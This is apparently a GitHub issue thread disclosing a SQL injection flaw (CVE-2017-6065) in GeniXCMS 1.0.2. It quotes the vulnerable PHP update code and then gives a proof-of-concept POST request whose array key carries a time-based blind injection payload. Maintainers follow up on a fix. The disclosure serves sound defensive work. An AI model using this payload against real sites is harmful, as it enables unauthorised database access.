SQL injection vulnerability in inc/lib/Control/Backend/menus.control.php in GeniXCMS v1.0.2(latest) discovered by "ADLab of Venustech"

[superfish9]

inc/lib/Control/Backend/menus.control.php(line 377):

                    if (isset($alertDanger)) {
                        $data['alertDanger'] = $alertDanger;
                    } else {
                        Menus::updateMenuOrder(
                            $_POST['order']
                        );
                        $data['alertSuccess'][] = 'Menu Order Changed';
                    }

The updateMenuOrder function in inc/lib/Menus.class.php(line 364):

    public static function updateMenuOrder($vars)
    {
        foreach ($vars as $k => $v) {
            
            // print_r($v);
            $sql = array(
                        'table' => 'menus',
                        'id' => Typo::int($k),
                        'key' => $v,
                    );
            Db::update($sql);
        }
    }

The update function in inc/lib/Db.class.php(line 322):

    public static function update($vars)
    {
        if (is_array($vars)) {
            $set = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);
                $set .= "`$key` = '$val',";
            }

            $set = substr($set, 0, -1);
            $sql = sprintf("UPDATE `%s` SET %s WHERE `id` = '%d' LIMIT 1", $vars['table'], $set, $vars['id']);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
        } elseif (DB_DRIVER == 'mysqli') {
            $q = self::query($sql);
        } elseif (DB_DRIVER == 'pdo') {
            $q = self::$pdo->exec($sql);
        }

        return true;
    }

We'll find that the "$key" in $set .= "$key = '$val',"; isn't be filtered, which leads to SQL injection.
PoC:
http://127.0.0.1/genixcms100/gxadmin/index.php?page=menus
POST parameters:

changeorder=1&token=YaJthps4lATcGzu81KwublEveIQWQJsTZ4EMCjNF9vDWFbHb4l02LTnxSsa55VKkMGph91SkwHXMpY99&order[0][id`%3D1 and (select * from (select(if(ascii(substr((select user()),1,1))%3D114,sleep(3),0)))a) and `name]=superfish

Don't forget to get a token first.

[semplon]

thank you, but this had been fixed at the latest release already. see this https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Db.class.php#L322

i don't know if the fix is solve the problem, but at least please try the latest release which is 1.0.2 already.

[superfish9]

mysql_escape_string filltered single quote, but attacker can do sql injection without single quote, like my PoC.

[semplon]

okay, i'll do some research first.

[fgeek]

This is CVE-2017-6065.

[fgeek]

@semplon What release or commit fixes this vulnerability?

[semplon]

aahh sorry again, i think i miss this issue.
i'll reopen again

[fgeek]

@semplon Could you create new release when you have completely fixed this vulnerability, thanks?

[semplon]

@fgeek sure, i'm still checking another bug.

[semplon]

Hello @fgeek, @superfish9 since You had contribute to GeniXCMS, I'll send You JetBrains Opensource License for You. Please provide me with Your email so I can send it to You.

Thanks

[fgeek]

@semplon Thank you for the offer, but not needed. I'm just here to make the internet more safer place for everyone and improve the quality of GeniX.

[semplon]

okay @fgeek, i'am really appreciate all your hard work to make GeniX more secure.

Thank You